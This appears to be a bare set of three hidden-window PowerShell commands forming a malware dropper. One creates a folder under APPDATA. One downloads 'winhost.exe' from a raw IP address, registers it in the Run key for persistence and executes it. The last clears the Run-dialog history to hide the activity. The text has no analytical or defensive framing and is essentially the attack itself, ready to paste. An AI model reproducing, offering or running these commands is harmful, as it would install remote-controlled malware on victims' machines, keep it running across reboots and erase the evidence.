powershell -w hidden -nop -c "New-Item -Path \"$env:APPDATA\.win\" -ItemType Directory -Force"
		    

powershell -w hidden -nop -c "$f=\"$env:APPDATA\.win\winhost.exe\"; iwr 'http://5.181.156.158/files/winhost.exe' -OutFile $f; reg add 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /v winhost /t REG_SZ /d $f /f; Start-Process $f"
	

powershell -w hidden -nop -c "reg delete 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' /va /f"